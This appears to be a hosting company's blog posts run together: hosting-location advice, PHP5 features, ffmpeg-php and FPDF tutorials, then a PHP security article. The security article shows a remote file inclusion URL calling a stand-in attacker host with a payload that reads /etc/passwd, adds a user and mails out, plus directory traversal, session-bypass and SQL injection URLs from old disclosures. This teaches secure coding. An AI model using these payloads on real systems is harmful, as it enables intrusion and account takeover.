A lot of users who are looking for web hosting usually take the location into matter to add to the complicated equation when looking for a web hosting company however it is not always the most important factor. It’s not completely unimportant but it is important to some point, you would at least want to have the datacenter at least in the same continent.

Of course, you won’t get the best speeds off your web hosting company if you are located in North America, it wouldn’t be the smartest idea to get your web hosting somewhere in southern Asia as it will be very slow & will be crawling for you and most of your clients if they are located in North America.

However, if you do take web hosting in a place such as Montreal, QC which is 5 hours north of New York, NY – The speed will not be that much different if it was actually located in Montreal, QC or New York, NY because the difference between the two is close to nothing at the speeds that the internet runs at.

To conclude, the best idea is to get your web hosting services at a company close to you but not necessarily very close but not necessarily very far that your web site would be very slow.

PHP5 has brought so much new features but because of its big syntax changes, a big percentage of the PHP developing base has not made the change. Here are the top 10 new features that could change your mind.

5: Better error handling with exceptions
I’m sure every PHP developer had been staring at the famous white screen with a “Syntax error” clueless at where the error is really at. With PHP5, you can actually handle PHP errors and do whatever you want with them, but that’s not all. They have also included exceptions which I’m sure most C++ or Java developers use. The good part is that instead of simply failing on with close no errors to you, you could put a few checks before and information you could need such as maybe a print_r() on an array. I have written an article about this: http://vexxhost.com/blog/?p=21

4: Completely rewritten MySQL extension
The MySQL databases are the PHP’s partner in crime. Many developers use this database system in their website’s because it is on of the easiest, free, open-source database software. However, its performance combined with PHP4 was close to poor. Introduced with PHP5 is a newer, rewritten, optimized MySQL extension which was also compatible with MySQL 5.0. It has also introduced other functions such as: Prepared statements, SSL connections, Multi-query functions.

3: A heck of a lot more useful functions
I have a few favorite PHP5 functions which speed up time while coding & enhances the website’s performance. One of my favorites is the __autoload() function – What it does that it would be called if a class that was created and did not exist. It provides you with the class name. This is useful because you don’t need to manage what includes you need for X and Y file and reduces the load for those who simply include all the classes in for every single PHP file. Also, another favorite is file_put_contents() which reduces the 6 lines of code to add something to one.

2: Finally! SQLite database support!
I’m sure a lot of developers will be happy about this one. While MySQL is very popular among most PHP developers, SQLite is much different than it. It actually uses normal files and reads them. It does not need a daemon (or called server) to run in order to execute any queries on it. It makes a better smaller database for these low traffic sites.

1: The best damn OOP support period
PHP programmers have spent an awful of long time trying to create hacks so in order that PHP can make a better OO programming language. Finally, they are rewarded with OO support that either PHP3 or PHP4 can match. It has anything you usually see in most of the other established coding languages. From Constructors, Destructors, Public, protected, private properties & methods, Interfaces, Abstract classes, Class type hints, Static properties and methods, Final properties and methods & a whole suite of magical methods.

That’s the top 5 for me. I hope you think that PHP5 deserves a try! (and we offer it with our hosting plans!)

You’ve probably heard of ffmpeg-php and it’s wide usability mostly in sites that involve with videos such as YouTube or any other similar site. Here’s a bit of an introduction to it and how to use it.

First thing, you’ve got to check that your web hosting provider actually has ffmpeg & ffmpeg-php extension installed on your account and then you could get started with ffmpeg. You can check if it’s installed by creating a PHP script and executing the following code:

extension_loaded('ffmpeg') or die("ffmpeg extension not loaded");

If you get “ffmpeg extension not loaded” then your web hosting provider does not have ffmpeg installed, if you get nothing, then you’re one the good track!

ffmpeg-php is very simple to learn, what it is pretty much is an interface that works with the ffmpeg software to make it easier for PHP developers to access.

Like any object in PHP, you’ll have to start with creating a new instance of it. You can do that by using the following line:

$ffmpegInstance = new ffmpeg_movie(“/path/to/movie/”);

Now that you’ve had that, you can use that instance to use the many features of ffmpeg-php which are from knowing the duration of the movie/audio in seconds to retrieving the bitrate of the movie/audio file.

Once here, it’s pretty much like object oriented programming, ex:
$ffmpegInstance->getDuration(); // Gets the duration in secs.
$ffmpegInstance->getVideoCodec(); // What type of compression/codec used

This can be very helpful when coding anything that has to do with uploading videos because you can know a lot of information about it. I’ve made a small script that pretty much retrieves all the information that ffmpeg can get right here

Generating PDF’s is an easy method to make a very nice printable and/or savable version of an article. This could be helpful in a WordPress blog or any articles website. This method utilizes the popular FPDF class.

First of all, I suggest you get the latest FPDF version from here. I suggest creating a directory such as “pdf” on your web hosting space. You will need to place the fpdf.php into that directory, you will only need it.

Let’s make our first “Hello World” example. Place the following in a file called test.php:

<?php
require('fpdf.php');
$pdf=new FPDF();
$pdf->AddPage();
$pdf->SetFont('Arial','B',16);
$pdf->Cell(40,10,'Hello World!');
$pdf->Output();
?>

Now let’s see that code line by line…

require('fpdf.php');
This line includes our FPDF class that we need to create the PDF file.

$pdf=new FPDF();
This line creates a new instance of the FPDF class which will be binded to $pdf

$pdf->AddPage();
This line tells FPDF to add a new page to the PDF file; obviously we need one page so we will call this function once.

$pdf->SetFont('Arial','B',16);
This line tells the FPDF class to change the font to Arial, bold, 16 pt.

$pdf->Cell(40,10,'Hello World!');
This line is just like the “echo” of PHP, the text fields in PDF files are just sort of rectangles with text in them, so we want the width of 40 pt. and a height of 10 pt., the third value is the text to be written in that rectangular box.

$pdf->Output();
Our final line, which pretty much means: “we’re done, show us our PDF!”

That’s a very simple FPDF usage, however, here is a bit of more advanced version of FPDF usage:

<?php
require('fpdf.php');
$pdf=new FPDF("L", "mm", "A4");
$pdf->AddPage();
$pdf->SetFont('Arial','BIU',30);
$pdf->SetTextColor(0,0,255);
$pdf->Cell(60,20,'PDF+PHP Test',1,1,C,0);
$pdf->Output();
?>

Now let’s do a quick review of that more advanced code:

$pdf=new FPDF("L", "mm", "A4");
This will create a new instance but instead will default to creating landscape pages because of the first L, P can be used instead to default to portrait pages. The second value is the default measurement unit, a choice of point (pt), millimeter (mm), centimeter (cm) and inch (in) is given. The last value is the size of the page, the choice of A3, A4, A5, Letter & Legal is given.

$pdf->AddPage();
Simple function, just add the page, you can tell the function to create either a portrait (P) or landscape (L) by giving it as a first value (ex: $pdf->AddPage("L"), $pdf->AddPage("P")).

$pdf->SetFont('Arial','BIU',38);
This required function again says that we want an Arial, 30 mm in size (because of the default size unit), the 'BIU' simply tells that we want it to be Bold, Italic & Underlined.

$pdf->SetTextColor(0,0,255);
This sets the default text color for the text we will be writing, I’ve chosen blue here, the first value is red (r), the second is green (g) & blue (b).

$pdf->Cell(60,20,'PDF+PHP Test',0,1,C,0);
This makes the so famous rectangle with 60 mm of width & 20 mm of height, we wrote ‘PDF+PHP Test’ and the first 0 means we do not want a border. The 1 next to it means that once it’s done the cell, it will go to the beginning of the next line, if 0 is provided, then it will be to the right of it, if 2 is provided then it will go below. The C is just the alignment which is center of the text inside the box, possible values are left (L), center (C), right (R).

$pdf->Output();
Output our brand new colorful PDF file!

Thanks for reading!

The goal of this article is to show common threats and challenges of programming secure PHP applications. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand — but they can.

PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.

On a site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL:

http://example.com/page.php?i=contact.html

The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:

- Has the programmer considered directory traversals like i=../../../etc/passwd?
- Does he check for the .html extension?
- Does he use fopen() to include the files?
- Has he thought about not allowing remote files?

In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:

http://example.com/page.php?i=http://evilperson.com/badscript.html

Where exec.html contains a couple of lines of code:

<?php
passthru ('cat /etc/passwd');
passthru ('useradd myuser -p password');
passthru ('echo another hacked server! | mail hacker@internet.com');
?>

I am sure you get the idea. A lot of bad things can be done from here.

Per default, PHP writes most of the variables into the global scope. Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly. Where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie, and Server) variables are put into the global scope.

The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.

This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global scope exploit. The code has been modified and simplified.

Under the ‘admin/’ directory, index.php checks whether the password matches the one in the database after posting the form:

<?php
if ($row['pass'] == $postedpass) {
session_register("name");
session_register("fullname");
session_register("id");
header("Location: index2.php");
}
?>

When the passwords match, the variables $name, $fullname and $id are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there:

<?php
if (!$PHPSESSID) {
header("Location: index.php");
exit(0);
} else {
session_start();
if (!$name) session_register("name");
if (!$fullname) session_register("fullname");
if (!$id) session_register("id");
}
?>

|If the session ID has not been set, the user will be directed back to the login screen. If there is a session ID, though, the script will resume the session and will put the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL:

http://example.com/admin/index2.php?PHPSESSID=1&name=admin &fullname=brian&id=admin

The GET variables $PHPSESSID, $name, $fullname and $id are created as global variables per default. So when you look at the if-else-structure above, you will notice that the script figures $PHPSESSID is set and that the three variables dedicated to authorize and identify the user can be set to anything you want. The database has not even been queried. A quick fix for this problem — by far not the perfect one — would be to check for $HTTP_SESSION_VARS['id'] or $_SESSION['id'] (PHP => v4.1.0) instead of $id.

Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.

The following bug in PHP-Nuke 5.x has been reported to the Bugtraq mailing on August 3, 2001. It is actually a combination of exploiting global variables and an unchecked SQL query variable.

The PHP-Nuke developers decided to add the “nuke” prefix to all tables in order to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites are run using the same database. Per default, $prefix = "nuke"; is defined in the configuration file config.php.

Let us now look at a few lines from the script article.php.

<?php
if (!isset($mainfile)) {
include("mainfile.php");
}
if (!isset($sid) && !isset($tid)) {
exit();
}
?>

And a bit further down: the SQL query.

<?php
mysql_query("UPDATE $prefix"._stories.
" SET counter=counter+1 where sid=$sid");
?>

To change the SQL query, we need to make sure $prefix is not set to its default value so we can set an arbitrary value via GET. The configuration file config.php is included in mainfile.php. As we know from the last chapter, we can set the variables $mainfile, $sid and $tid to any value using GET parameters. By doing so, the script will think mainfile.php has been included and $prefix has been set accordingly. Now, we are in a position to execute any SQL query starting with UPDATE. So the following query will set all admin passwords to ‘1′:

http://phpnukesite.com/article.php?mainfile=1&sid=1&tid=1 &prefix=nuke.authors%20set%20pwd=1%23

The query now looks like this:

UPDATE nuke.nuke_authors set pwd=1#_stories
SET counter=counter+1 where sid=$sid

Of course, anything after # will be considered as a comment and will be ignored.

More to come.